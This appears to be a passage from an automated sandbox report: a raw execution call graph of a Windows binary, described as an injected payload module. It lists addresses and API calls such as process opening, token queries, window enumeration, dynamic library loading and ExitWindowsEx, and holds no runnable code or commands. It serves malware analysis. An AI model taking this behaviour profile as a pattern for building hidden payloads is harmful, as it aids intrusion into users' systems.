119533->119535 119538 1115f2c5 _free 65 API calls 119534->119538 119536 1116fdb8 119535->119536 119537 1116fdac 119535->119537 119555 1116fde3 LeaveCriticalSection _doexit 119536->119555 119539 1115f2c5 _free 65 API calls 119537->119539 119538->119536 119540 1116fdb2 119539->119540 119554 111659cf 66 API calls __getptd_noexit 119540->119554 119544->119522 119545->119525 119549 11166462 119547->119549 119550 11166498 119549->119550 119551 11166479 Sleep 119549->119551 119556 1115f231 119549->119556 119550->119526 119550->119527 119552 1116648e 119551->119552 119552->119549 119552->119550 119553->119528 119554->119536 119555->119528 119557 1115f2ae 119556->119557 119563 1115f23f 119556->119563 119579 11169b88 DecodePointer 119557->119579 119559 1115f2b4 119580 111659cf 66 API calls __getptd_noexit 119559->119580 119562 1115f26d RtlAllocateHeap 119562->119563 119572 1115f2a6 119562->119572 119563->119562 119565 1115f29a 119563->119565 119566 1115f24a 119563->119566 119570 1115f298 119563->119570 119576 11169b88 DecodePointer 119563->119576 119577 111659cf 66 API calls __getptd_noexit 119565->119577 119566->119563 119573 1116a07d 66 API calls 2 library calls 119566->119573 119574 11169ece 66 API calls 7 library calls 119566->119574 119575 11169c0d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 119566->119575 119578 111659cf 66 API calls __getptd_noexit 119570->119578 119572->119549 119573->119566 119574->119566 119576->119563 119577->119570 119578->119572 119579->119559 119580->119572 119582->119267 119583->119261 119584->119275 119585->119278 119586->119276 119587->119278 119589 11160fed 119588->119589 119590 11161006 119588->119590 119589->119590 119621 1116c895 8 API calls 119589->119621 119592 11161ca8 119590->119592 119622 1116fd13 LeaveCriticalSection 119592->119622 119594 11161bf5 119595 1116195a 119594->119595 119596 11161983 119595->119596 119597 1116199e 119595->119597 119599 11161620 __setlocale_set_cat 101 API calls 119596->119599 119602 
1116198d 119596->119602 119600 11161aef 119597->119600 119608 11161ac8 119597->119608 119609 111619d3 _strpbrk _strncmp _strcspn _strlen 119597->119609 119599->119602 119623 111613ff 119600->119623 119603 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 119602->119603 119604 11161b74 119603->119604 119604->119302 119604->119303 119605 11161b04 __expandlocale 119605->119602 119605->119608 119637 11161620 119605->119637 119608->119602 119683 1116129a 70 API calls 6 library calls 119608->119683 119609->119602 119609->119608 119610 11161ae1 119609->119610 119612 11161620 __setlocale_set_cat 101 API calls 119609->119612 119679 11165219 66 API calls __tsopen_nolock 119609->119679 119680 1116a592 119610->119680 119612->119609 119613->119286 119614->119293 119615->119310 119616->119312 119617->119313 119618->119293 119619->119306 119620->119293 119621->119590 119622->119594 119624 11167e95 __getptd 66 API calls 119623->119624 119625 1116143a 119624->119625 119629 111614a7 119625->119629 119635 111614a0 __expandlocale _memmove _strlen 119625->119635 119727 1116857f 119625->119727 119626 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 119627 1116161e 119626->119627 119627->119605 119629->119626 119631 1116a592 __invoke_watson 10 API calls 119631->119635 119633 1116857f _strcpy_s 66 API calls 119633->119635 119635->119629 119635->119631 119635->119633 119684 11161110 119635->119684 119691 11170419 119635->119691 119736 1116122f 66 API calls 3 library calls 119635->119736 119737 11165219 66 API calls __tsopen_nolock 119635->119737 119638 11167e95 __getptd 66 API calls 119637->119638 119639 1116164d 119638->119639 119640 111613ff __expandlocale 96 API calls 119639->119640 119644 11161675 __expandlocale _strlen 119640->119644 119641 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 119642 1116168a 119641->119642 119642->119605 119643 1116167c 119643->119641 119644->119643 119645 11166459 
__malloc_crt 66 API calls 119644->119645 119646 111616c6 _memmove 119645->119646 119646->119643 119647 1116857f _strcpy_s 66 API calls 119646->119647 119649 11161739 _memmove 119647->119649 119666 11161928 119649->119666 119672 1116183d _memcmp 119649->119672 119763 111706f1 79 API calls 2 library calls 119649->119763 119679->119609 119766 1116a469 119680->119766 119683->119602 119685 11161129 _memset 119684->119685 119687 11161135 119685->119687 119690 11161158 _strcspn 119685->119690 119738 11165219 66 API calls __tsopen_nolock 119685->119738 119687->119635 119688 1116a592 __invoke_watson 10 API calls 119688->119690 119690->119687 119690->119688 119739 11165219 66 API calls __tsopen_nolock 119690->119739 119692 11167e95 __getptd 66 API calls 119691->119692 119695 11170426 119692->119695 119694 1117045d 119697 111704c5 119694->119697 119700 1117046f 119694->119700 119695->119694 119698 11170433 GetUserDefaultLCID 119695->119698 119750 1116fe8c 85 API calls _LanguageEnumProc@4 119695->119750 119696 111704ba 119726 111705fb 119696->119726 119740 1116feee 119696->119740 119697->119698 119701 111704d0 _strlen 119697->119701 119698->119696 119703 11170483 119700->119703 119704 1117047a 119700->119704 119708 111704d6 EnumSystemLocalesA 119701->119708 119755 111703dd EnumSystemLocalesA _GetPrimaryLen _strlen 119703->119755 119751 11170376 119704->119751 119706 1117052b 119711 11170550 IsValidCodePage 119706->119711 119706->119726 119708->119696 119709 11170481 119709->119696 119756 1116fe8c 85 API calls _LanguageEnumProc@4 119709->119756 119712 11170562 IsValidLocale 119711->119712 119711->119726 119718 11170575 119712->119718 119712->119726 119713 111704a1 119713->119696 119714 111704bc 119713->119714 119715 111704b3 119713->119715 119757 111703dd EnumSystemLocalesA _GetPrimaryLen _strlen 119714->119757 119719 11170376 _GetLcidFromLangCountry EnumSystemLocalesA 119715->119719 119717 111705c6 GetLocaleInfoA 119717->119726 119718->119717 119720 1116857f _strcpy_s 66 API 
calls 119718->119720 119718->119726 119719->119696 119726->119635 119728 11168594 119727->119728 119729 1116858d 119727->119729 119760 111659cf 66 API calls __getptd_noexit 119728->119760 119729->119728 119734 111685b2 119729->119734 119731 11168599 119761 1116a5e4 11 API calls __tsopen_nolock 119731->119761 119733 111685a3 119733->119635 119734->119733 119762 111659cf 66 API calls __getptd_noexit 119734->119762 119736->119635 119737->119635 119738->119690 119739->119690 119741 1116ff48 GetLocaleInfoW 119740->119741 119743 1116fef8 __expandlocale 119740->119743 119742 1116ff64 119741->119742 119744 1116ff37 119741->119744 119742->119744 119745 1116ff6a GetACP 119742->119745 119743->119741 119746 1116ff0e __expandlocale 119743->119746 119744->119706 119745->119706 119747 1116ff1f GetLocaleInfoW 119746->119747 119748 1116ff3c 119746->119748 119747->119744 119759 1115f4b1 79 API calls __wcstoi64 119748->119759 119750->119694 119752 1117037d _GetPrimaryLen _strlen 119751->119752 119753 111703b3 EnumSystemLocalesA 119752->119753 119754 111703cd 119753->119754 119754->119709 119755->119709 119756->119713 119757->119696 119759->119744 119760->119731 119761->119733 119762->119731 119763->119672 119767 1116a488 _memset __call_reportfault 119766->119767 119768 1116a4a6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 119767->119768 119771 1116a574 __call_reportfault 119768->119771 119769 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 119770 1116a590 GetCurrentProcess TerminateProcess 119769->119770 119770->119602 119771->119769 119773 1113ee76 119772->119773 119774 1113ef33 119773->119774 119779 11080b80 119773->119779 119774->119320 119776 1113ee9b 119777 11080b80 IsDBCSLeadByte 119776->119777 119778 1113eecb _memmove 119777->119778 119778->119320 119780 11080b8c 119779->119780 119782 11080b91 std::_Mutex::_Mutex __mbschr_l 119779->119782 119783 11080aa0 IsDBCSLeadByte 119780->119783 119782->119776 119783->119782 119785 
1113e63a 119784->119785 119786 1113e63c 119784->119786 119785->119335 119796 1110c530 119786->119796 119788 1113e662 119789 1113e66b _strncpy 119788->119789 119790 1113e689 119788->119790 119789->119335 119803 110290c0 265 API calls 2 library calls 119790->119803 119805 11060490 119793->119805 119797 1115f231 _malloc 66 API calls 119796->119797 119798 1110c53e 119797->119798 119799 1110c547 119798->119799 119800 1110c55e _memset 119798->119800 119804 110290c0 265 API calls 2 library calls 119799->119804 119800->119788 119816 1105fdb0 119805->119816 119817 1110c4b0 std::_Mutex::_Mutex 265 API calls 119816->119817 119818 1105fdcc 119817->119818 119819 1105fe15 119818->119819 119820 1105fdd3 119818->119820 119875 1115e87a 66 API calls std::exception::_Copy_str 119819->119875 119868 1105d940 119820->119868 119824 1105fe24 119869 1105d951 LeaveCriticalSection 119868->119869 119870 1105d95b 119868->119870 119869->119870 119875->119824 119912->119345 121065->119404 121066->119410 121067 110303a1 GetNativeSystemInfo 121068 110303ad 121067->121068 121071 11030411 121068->121071 121072 1103034d 121068->121072 121082 11030354 121068->121082 121069 110305a7 GetStockObject GetObjectA 121070 110305d6 SetErrorMode SetErrorMode 121069->121070 121076 1110c4b0 std::_Mutex::_Mutex 265 API calls 121070->121076 121075 1110c4b0 std::_Mutex::_Mutex 265 API calls 121071->121075 121074 1110c4b0 std::_Mutex::_Mutex 265 API calls 121072->121074 121074->121082 121077 11030418 121075->121077 121078 11030612 121076->121078 121135 110f8090 272 API calls std::_Mutex::_Mutex 121077->121135 121080 11027fb0 268 API calls 121078->121080 121081 1103062c 121080->121081 121083 1110c4b0 std::_Mutex::_Mutex 265 API calls 121081->121083 121082->121069 121084 11030652 121083->121084 121085 11027fb0 268 API calls 121084->121085 121086 1103066b InterlockedExchange 121085->121086 121088 1110c4b0 std::_Mutex::_Mutex 265 API calls 121086->121088 121089 11030693 121088->121089 121090 11089560 267 API calls 
121089->121090 121091 110306ab GetACP 121090->121091 121093 1115f7b3 _sprintf 102 API calls 121091->121093 121094 110306d2 121093->121094 121095 11161b76 _setlocale 101 API calls 121094->121095 121096 110306dc 121095->121096 121097 1113ef50 86 API calls 121096->121097 121098 11030708 121097->121098 121099 1110c4b0 std::_Mutex::_Mutex 265 API calls 121098->121099 121100 11030728 121099->121100 121101 110605c0 301 API calls 121100->121101 121102 11030753 121101->121102 121103 110307a0 121102->121103 121104 1110c4b0 std::_Mutex::_Mutex 265 API calls 121102->121104 121105 110cb7c0 4 API calls 121103->121105 121106 1103077a 121104->121106 121107 110307c6 121105->121107 121109 11060230 293 API calls 121106->121109 121108 1110c4b0 std::_Mutex::_Mutex 265 API calls 121107->121108 121110 110307cd 121108->121110 121109->121103 121111 11121ff0 509 API calls 121110->121111 121112 110307ef 121111->121112 121113 11111350 268 API calls 121112->121113 121114 11030810 121113->121114 121115 1110c4b0 std::_Mutex::_Mutex 265 API calls 121114->121115 121116 11030827 121115->121116 121117 11087960 268 API calls 121116->121117 121118 1103083f 121117->121118 121119 1110c4b0 std::_Mutex::_Mutex 265 API calls 121118->121119 121120 11030856 121119->121120 121121 1105b8d0 325 API calls 121120->121121 121122 1103087a 121121->121122 121123 1105bcc0 427 API calls 121122->121123 121124 110308a0 121123->121124 121125 11026dc0 122 API calls 121124->121125 121126 110308a5 121125->121126 121127 1100d4f0 FreeLibrary 121126->121127 121128 110308c0 121127->121128 121129 1100d210 wsprintfA 121128->121129 121132 110308d9 121128->121132 121130 110308ce 121129->121130 121131 11142790 std::_Mutex::_Mutex 21 API calls 121130->121131 121131->121132 121133 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121132->121133 121134 11030a3f 121133->121134 121135->121082 121136 11030ac1 121137 11030b29 GetWindowsDirectoryA 121136->121137 121138 11030ac8 121136->121138 121139 11030b38 
121137->121139 121167 11030d9b std::ios_base::_Ios_base_dtor 121137->121167 121141 1105d350 79 API calls 121139->121141 121140 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121142 11030e14 121140->121142 121143 11030b51 121141->121143 121144 1110c4b0 std::_Mutex::_Mutex 265 API calls 121143->121144 121145 11030b9d 121144->121145 121146 11030bb4 121145->121146 121172 1104f6c0 266 API calls 3 library calls 121145->121172 121148 1110c4b0 std::_Mutex::_Mutex 265 API calls 121146->121148 121149 11030bc8 121148->121149 121150 11030be3 EnumWindows 121149->121150 121173 1104f6c0 266 API calls 3 library calls 121149->121173 121174 11140f70 121150->121174 121354 1102fb50 GetWindowRect 121150->121354 121156 11030c1f 121157 11030c50 EnumWindows 121156->121157 121158 11030c77 121157->121158 121159 11030c6a Sleep 121157->121159 121384 1102fb50 288 API calls 2 library calls 121157->121384 121160 11030c83 121158->121160 121161 11030c8d 121158->121161 121159->121157 121159->121158 121162 11142790 std::_Mutex::_Mutex 21 API calls 121160->121162 121163 11030ca2 Sleep 121161->121163 121165 11030ca7 121161->121165 121162->121161 121169 11030cc3 121163->121169 121166 11030cb9 Sleep 121165->121166 121165->121169 121199 11027a90 270 API calls 3 library calls 121165->121199 121166->121165 121166->121169 121167->121140 121168 11142790 std::_Mutex::_Mutex 21 API calls 121168->121169 121169->121167 121169->121168 121170 11030d67 SendMessageA 121169->121170 121171 11030d10 121169->121171 121170->121171 121171->121167 121171->121169 121171->121170 121172->121146 121173->121150 121175 11140f92 121174->121175 121179 11140fa9 std::_Mutex::_Mutex 121174->121179 121225 110290c0 265 API calls 2 library calls 121175->121225 121178 11141137 121180 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121178->121180 121179->121178 121181 11140fdc GetModuleFileNameA 121179->121181 121182 11030c11 121180->121182 121200 11080c50 121181->121200 
121198 11143200 267 API calls 121182->121198 121184 11140ff1 121185 11141001 SHGetFolderPathA 121184->121185 121186 111410e8 121184->121186 121188 1114102e 121185->121188 121189 1114104d SHGetFolderPathA 121185->121189 121187 1113e630 std::_Mutex::_Mutex 262 API calls 121186->121187 121187->121178 121188->121189 121192 11141034 121188->121192 121191 11141082 std::_Mutex::_Mutex 121189->121191 121204 1102a220 121191->121204 121226 110290c0 265 API calls 2 library calls 121192->121226 121198->121156 121199->121165 121201 11080c63 _strrchr 121200->121201 121203 11080c7a std::_Mutex::_Mutex 121201->121203 121227 11080aa0 IsDBCSLeadByte 121201->121227 121203->121184 121228 11028260 121204->121228 121206 1102a22e 121207 11140a10 121206->121207 121208 11140a9a 121207->121208 121209 11140a1b 121207->121209 121208->121186 121209->121208 121210 11140a2b GetFileAttributesA 121209->121210 121211 11140a45 121210->121211 121212 11140a37 121210->121212 121213 11161cea __strdup 66 API calls 121211->121213 121212->121186 121214 11140a4c 121213->121214 121215 11080c50 std::_Mutex::_Mutex IsDBCSLeadByte 121214->121215 121216 11140a56 121215->121216 121217 11140a10 std::_Mutex::_Mutex 67 API calls 121216->121217 121223 11140a73 121216->121223 121218 11140a66 121217->121218 121219 11140a7c 121218->121219 121220 11140a6e 121218->121220 121222 1115f2c5 _free 66 API calls 121219->121222 121221 1115f2c5 _free 66 API calls 121220->121221 121221->121223 121224 11140a81 CreateDirectoryA 121222->121224 121223->121186 121224->121223 121227->121203 121229 11028283 121228->121229 121230 110288cb 121228->121230 121231 11028340 GetModuleFileNameA 121229->121231 121240 110282b8 121229->121240 121233 11028967 121230->121233 121234 1102897a 121230->121234 121232 11028361 _strrchr 121231->121232 121239 1116067b std::_Mutex::_Mutex 143 API calls 121232->121239 121236 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121233->121236 121235 1115e3e1 
__ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 121234->121235 121238 1102898b 121235->121238 121237 11028976 121236->121237 121237->121206 121238->121206 121241 1102833b 121239->121241 121240->121240 121242 1116067b std::_Mutex::_Mutex 143 API calls 121240->121242 121241->121230 121258 110264a0 81 API calls 2 library calls 121241->121258 121242->121241 121244 110283b4 121245 1115f4c7 std::_Mutex::_Mutex 79 API calls 121244->121245 121254 11028835 121244->121254 121247 110283c5 121245->121247 121247->121254 121259 11026310 66 API calls 3 library calls 121247->121259 121249 110283f0 121260 110264a0 81 API calls 2 library calls 121249->121260 121251 11028400 std::_Mutex::_Mutex 121251->121254 121261 110264a0 81 API calls 2 library calls 121251->121261 121264 11160445 121254->121264 121256 11160d5e 85 API calls _LanguageEnumProc@4 121257 11028423 __mbschr_l 121256->121257 121257->121254 121257->121256 121262 11026310 66 API calls 3 library calls 121257->121262 121263 110264a0 81 API calls 2 library calls 121257->121263 121258->121244 121259->121249 121260->121251 121261->121257 121262->121257 121263->121257 121265 11160451 __tsopen_nolock 121264->121265 121266 11160463 121265->121266 121267 11160478 121265->121267 121299 111659cf 66 API calls __getptd_noexit 121266->121299 121274 11160473 __tsopen_nolock 121267->121274 121277 11167679 121267->121277 121270 11160468 121300 1116a5e4 11 API calls __tsopen_nolock 121270->121300 121274->121230 121278 111676ad EnterCriticalSection 121277->121278 121279 1116768b 121277->121279 121281 11160491 121278->121281 121279->121278 121280 11167693 121279->121280 121282 1116fdec __lock 66 API calls 121280->121282 121283 111603d8 121281->121283 121282->121281 121284 111603fd 121283->121284 121285 111603e9 121283->121285 121291 111603f9 121284->121291 121302 11167757 121284->121302 121342 111659cf 66 API calls __getptd_noexit 121285->121342 121288 111603ee 121343 1116a5e4 11 API calls __tsopen_nolock 121288->121343 
121301 111604b1 LeaveCriticalSection LeaveCriticalSection __ftelli64 121291->121301 121295 11160417 121319 1116d6b4 121295->121319 121297 1116041d 121297->121291 121298 1115f2c5 _free 66 API calls 121297->121298 121298->121291 121299->121270 121300->121274 121301->121274 121303 11167770 121302->121303 121304 11160409 121302->121304 121303->121304 121305 11165967 __ungetc_nolock 66 API calls 121303->121305 121308 1116d778 121304->121308 121306 1116778b 121305->121306 121344 1116e8f4 97 API calls 4 library calls 121306->121344 121309 1116d788 121308->121309 121311 11160411 121308->121311 121310 1115f2c5 _free 66 API calls 121309->121310 121309->121311 121310->121311 121312 11165967 121311->121312 121313 11165973 121312->121313 121314 11165988 121312->121314 121345 111659cf 66 API calls __getptd_noexit 121313->121345 121314->121295 121316 11165978 121346 1116a5e4 11 API calls __tsopen_nolock 121316->121346 121318 11165983 121318->121295 121320 1116d6c0 __tsopen_nolock 121319->121320 121321 1116d6c8 121320->121321 121322 1116d6e3 121320->121322 121347 111659e2 66 API calls __getptd_noexit 121321->121347 121323 1116d6ef 121322->121323 121328 1116d729 121322->121328 121349 111659e2 66 API calls __getptd_noexit 121323->121349 121326 1116d6cd 121348 111659cf 66 API calls __getptd_noexit 121326->121348 121327 1116d6f4 121350 111659cf 66 API calls __getptd_noexit 121327->121350 121331 111730e5 ___lock_fhandle 68 API calls 121328->121331 121333 1116d72f 121331->121333 121332 1116d6fc 121351 1116a5e4 11 API calls __tsopen_nolock 121332->121351 121335 1116d73d 121333->121335 121336 1116d749 121333->121336 121339 1116d618 __close_nolock 69 API calls 121335->121339 121352 111659cf 66 API calls __getptd_noexit 121336->121352 121338 1116d6d5 __tsopen_nolock 121338->121297 121340 1116d743 121339->121340 121353 1116d770 LeaveCriticalSection __unlock_fhandle 121340->121353 121342->121288 121343->121291 121344->121304 121345->121316 121346->121318 121347->121326 121348->121338 
Execution Graph (rendered as an interactive call-graph widget on the original page; the raw node/edge dump that the extraction left here is omitted). The API names that remain readable in the graph, grouped roughly by the call chain they appear in, are:

Functions at 0x1102xxxx-0x1117xxxx (the injected payload module):
  Window-to-process lookup: GetWindowLongA, GetClassNameA, GetWindowThreadProcessId, OpenProcess, LoadLibraryA, GetProcAddress, K32GetProcessImageFileNameA, SetLastError, CloseHandle, FreeLibrary
  Token query: GetModuleHandleA, GetProcAddress, GetCurrentProcessId, OpenProcess, OpenProcessToken, GetTokenInformation, CloseHandle
  File and path handling: wsprintfA, GetTickCount, SHGetFolderPathA, CreateFileA, GetModuleFileNameA, GetFileAttributesA, ExpandEnvironmentStringsA, FindFirstFileA, FindNextFileA, FindClose
  COM and shell: CoInitializeSecurity, CoInitialize, CoCreateInstance, CoUninitialize, wsprintfW, SysAllocString, SysFreeString, SHGetSettings, _com_util::ConvertStringToBSTR
  Shutdown path: SetEvent, Sleep, SendMessageTimeoutA, FreeLibrary, ExitWindowsEx, ExitProcess
  Window control: FindWindowA, GetWindowThreadProcessId, OpenProcess, SendMessageA, WaitForSingleObject, PostMessageA, IsWindow, IsWindowVisible, IsIconic, GetForegroundWindow, SetForegroundWindow, EnableWindow, SetWindowTextA, SetDlgItemTextA, LoadLibraryExA, LoadIconA, LoadImageA, GetSystemMetrics, CreateEventA
  Locale and housekeeping: GetLocaleInfoA, GetLocaleInfoW, GetLocalTime, GetCurrentProcess, GetCurrentThreadId, InterlockedIncrement, InterlockedDecrement, EnterCriticalSection, RegCloseKey, GetLastError, IsDBCSLeadByte, _memset, _fgets, _strpbrk, _calloc, _free

DLL mapped at 0x6cd6xxxx (CRT start-up through ___DllMainCRTStartup and __CRT_INIT@12): GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter, HeapCreate, HeapDestroy, HeapFree, RtlAllocateHeap, TlsGetValue, TlsSetValue, DecodePointer, GetCommandLineA, GetLastError, Sleep
GetTokenInformation 125324->125338 125327->125320 125327->125324 125329 110400ea 125330 110400f2 CloseHandle 125329->125330 125333 110400f9 125329->125333 125330->125333 125331 1104013b 125334 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125331->125334 125332 11040121 125335 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125332->125335 125333->125331 125333->125332 125336 11040154 125334->125336 125337 11040137 125335->125337 125339 110f86e8 125338->125339 125340 110f86d7 125338->125340 125349 110efbd0 9 API calls 125339->125349 125341 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125340->125341 125343 110f86e4 125341->125343 125343->125329 125344 110f870c 125344->125340 125345 110f8714 125344->125345 125346 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125345->125346 125347 110f873a 125346->125347 125347->125329 125348->125327 125349->125344 125350 111405a0 125351 111405b1 125350->125351 125364 1113ffc0 125351->125364 125355 11140635 125358 11140652 125355->125358 125360 11140634 125355->125360 125356 111405fb 125357 11140602 ResetEvent 125356->125357 125372 11140180 265 API calls 2 library calls 125357->125372 125360->125355 125373 11140180 265 API calls 2 library calls 125360->125373 125361 11140616 SetEvent WaitForMultipleObjects 125361->125357 125361->125360 125363 1114064f 125363->125358 125365 1113ffef 125364->125365 125366 1113ffcc GetCurrentProcess 125364->125366 125368 1110c4b0 std::_Mutex::_Mutex 263 API calls 125365->125368 125370 11140019 WaitForMultipleObjects 125365->125370 125366->125365 125367 1113ffdd GetModuleFileNameA 125366->125367 125367->125365 125369 1114000b 125368->125369 125369->125370 125374 1113f910 GetModuleFileNameA 125369->125374 125370->125355 125370->125356 125372->125361 125373->125363 125375 1113f993 125374->125375 125376 1113f953 125374->125376 125379 1113f9b9 GetModuleHandleA GetProcAddress 
125375->125379 125380 1113f99f LoadLibraryA 125375->125380 125377 11080c50 std::_Mutex::_Mutex IsDBCSLeadByte 125376->125377 125378 1113f961 125377->125378 125378->125375 125381 1113f968 LoadLibraryA 125378->125381 125383 1113f9e7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 125379->125383 125384 1113f9d9 125379->125384 125380->125379 125382 1113f9ae LoadLibraryA 125380->125382 125381->125375 125382->125379 125385 1113fa13 10 API calls 125383->125385 125384->125385 125386 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125385->125386 125387 1113fa90 125386->125387 125387->125370 125388 6cd463a0 125393 6cd46350 125388->125393 125391 6cd463b1 Sleep 125392 6cd463a9 WSACancelBlockingCall 125394 6cd4638d 125393->125394 125395 6cd628e1 _strlwr_s_l_stat 5 API calls 125394->125395 125396 6cd46397 125395->125396 125396->125391 125396->125392 125397 1102fe74 125398 1113ee00 267 API calls 125397->125398 125399 1102fe82 125398->125399 125400 1113ef50 86 API calls 125399->125400 125401 1102fec5 125400->125401 125402 1102feda 125401->125402 125404 11080cc0 86 API calls 125401->125404 125403 110eae40 8 API calls 125402->125403 125405 1102ff05 125403->125405 125404->125402 125407 1102ff4c 125405->125407 125450 110eaef0 81 API calls 2 library calls 125405->125450 125409 1113ef50 86 API calls 125407->125409 125408 1102ff1a 125451 110eaef0 81 API calls 2 library calls 125408->125451 125411 1102ff61 125409->125411 125413 1110c4b0 std::_Mutex::_Mutex 265 API calls 125411->125413 125412 1102ff30 125412->125407 125414 11142710 19 API calls 125412->125414 125415 1102ff70 125413->125415 125414->125407 125416 1102ff91 125415->125416 125417 11087960 268 API calls 125415->125417 125418 11089560 267 API calls 125416->125418 125417->125416 125419 1102ffa4 OpenMutexA 125418->125419 125420 1102ffc3 CreateMutexA 125419->125420 125421 110300ac CloseHandle 125419->125421 125423 1102ffe5 125420->125423 125443 11089660 125421->125443 125424 1110c4b0 
std::_Mutex::_Mutex 265 API calls 125423->125424 125425 1102fffa 125424->125425 125427 1103001d 125425->125427 125428 11060230 293 API calls 125425->125428 125426 110300c2 125429 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125426->125429 125452 11015e40 LoadLibraryA 125427->125452 125428->125427 125431 11030a3f 125429->125431 125432 1103002f 125433 11030043 GetProcAddress 125432->125433 125434 11030059 125432->125434 125433->125434 125435 1103005d SetLastError 125433->125435 125436 11027de0 47 API calls 125434->125436 125435->125434 125437 1103006a 125436->125437 125453 110092c0 428 API calls std::_Mutex::_Mutex 125437->125453 125439 11030079 125440 11030082 WaitForSingleObject 125439->125440 125440->125440 125441 11030094 CloseHandle 125440->125441 125441->125421 125442 110300a5 FreeLibrary 125441->125442 125442->125421 125444 11089707 125443->125444 125448 1108969a std::ios_base::_Ios_base_dtor 125443->125448 125445 1108970e DeleteCriticalSection 125444->125445 125454 111579b0 125445->125454 125447 110896ae CloseHandle 125447->125448 125448->125444 125448->125447 125449 11089734 std::ios_base::_Ios_base_dtor 125449->125426 125450->125408 125451->125412 125452->125432 125453->125439 125457 111579c4 125454->125457 125455 111579c8 125455->125449 125457->125455 125458 111576b0 67 API calls 2 library calls 125457->125458 125458->125457 125459 11088b10 125460 1110c770 ___DllMainCRTStartup 4 API calls 125459->125460 125461 11088b23 125460->125461 125462 11088b2d 125461->125462 125471 11088250 268 API calls std::_Mutex::_Mutex 125461->125471 125465 11088b54 125462->125465 125472 11088250 268 API calls std::_Mutex::_Mutex 125462->125472 125467 11088b63 125465->125467 125468 11088ae0 125465->125468 125473 11088770 125468->125473 125471->125462 125472->125465 125514 11087a70 6 API calls ___DllMainCRTStartup 125473->125514 125475 110887a9 GetParent 125476 110887bc 125475->125476 125477 110887cd 125475->125477 125478 110887c0 GetParent 
125476->125478 125479 11141160 267 API calls 125477->125479 125478->125477 125478->125478 125480 110887d9 125479->125480 125481 1116067b std::_Mutex::_Mutex 143 API calls 125480->125481 125482 110887e6 std::ios_base::_Ios_base_dtor 125481->125482 125483 11141160 267 API calls 125482->125483 125484 110887ff 125483->125484 125515 110139f0 22 API calls 2 library calls 125484->125515 125486 1108881a 125486->125486 125487 1113f5d0 std::_Mutex::_Mutex 8 API calls 125486->125487 125490 1108885a std::ios_base::_Ios_base_dtor 125487->125490 125488 11088875 125489 11160445 std::_Mutex::_Mutex 102 API calls 125488->125489 125492 11088893 std::_Mutex::_Mutex 125488->125492 125489->125492 125490->125488 125491 1113e630 std::_Mutex::_Mutex 265 API calls 125490->125491 125491->125488 125494 1102a220 std::_Mutex::_Mutex 145 API calls 125492->125494 125505 11088944 std::ios_base::_Ios_base_dtor 125492->125505 125493 1115e3e1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 125495 11088a32 125493->125495 125496 110888e3 125494->125496 125495->125467 125497 1113e630 std::_Mutex::_Mutex 265 API calls 125496->125497 125498 110888eb 125497->125498 125499 11080c50 std::_Mutex::_Mutex IsDBCSLeadByte 125498->125499 125500 11088902 125499->125500 125501 11080cc0 86 API calls 125500->125501 125500->125505 125502 1108891a 125501->125502 125503 1108895e 125502->125503 125504 11088921 125502->125504 125507 11080cc0 86 API calls 125503->125507 125516 110b6660 125504->125516 125505->125493 125509 11088969 125507->125509 125509->125505 125511 110b6660 68 API calls 125509->125511 125510 110b6660 68 API calls 125510->125505 125512 11088976 125511->125512 125512->125505 125513 110b6660 68 API calls 125512->125513 125513->125505 125514->125475 125515->125486 125519 110b6640 125516->125519 125522 111639c3 125519->125522 125525 11163944 125522->125525 125526 11163951 125525->125526 125527 1116396b 125525->125527 125543 111659e2 66 API calls __getptd_noexit 125526->125543 
125527->125526 125529 11163974 GetFileAttributesA 125527->125529 125531 11163982 GetLastError 125529->125531 125534 11163998 125529->125534 125530 11163956 125544 111659cf 66 API calls __getptd_noexit 125530->125544 125546 111659f5 66 API calls 2 library calls 125531->125546 125536 11088927 125534->125536 125548 111659e2 66 API calls __getptd_noexit 125534->125548 125535 1116395d 125545 1116a5e4 11 API calls __tsopen_nolock 125535->125545 125536->125505 125536->125510 125537 1116398e 125547 111659cf 66 API calls __getptd_noexit 125537->125547 125541 111639ab 125549 111659cf 66 API calls __getptd_noexit 125541->125549 125543->125530 125544->125535 125545->125536 125546->125537 125547->125536 125548->125541 125549->125537 125550 11165ded 125551 11165dfd 125550->125551 125552 11165df8 125550->125552 125556 11165cf7 125551->125556 125568 11173758 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 125552->125568 125555 11165e0b 125558 11165d03 __tsopen_nolock 125556->125558 125557 11165d50 125565 11165da0 __tsopen_nolock 125557->125565 125619 11025ad0 125557->125619 125558->125557 125558->125565 125569 11165b93 125558->125569 125561 11165d63 125562 11165d80 125561->125562 125564 11025ad0 ___DllMainCRTStartup 7 API calls 125561->125564 125563 11165b93 __CRT_INIT@12 149 API calls 125562->125563 125562->125565 125563->125565 125566 11165d77 125564->125566 125565->125555 125567 11165b93 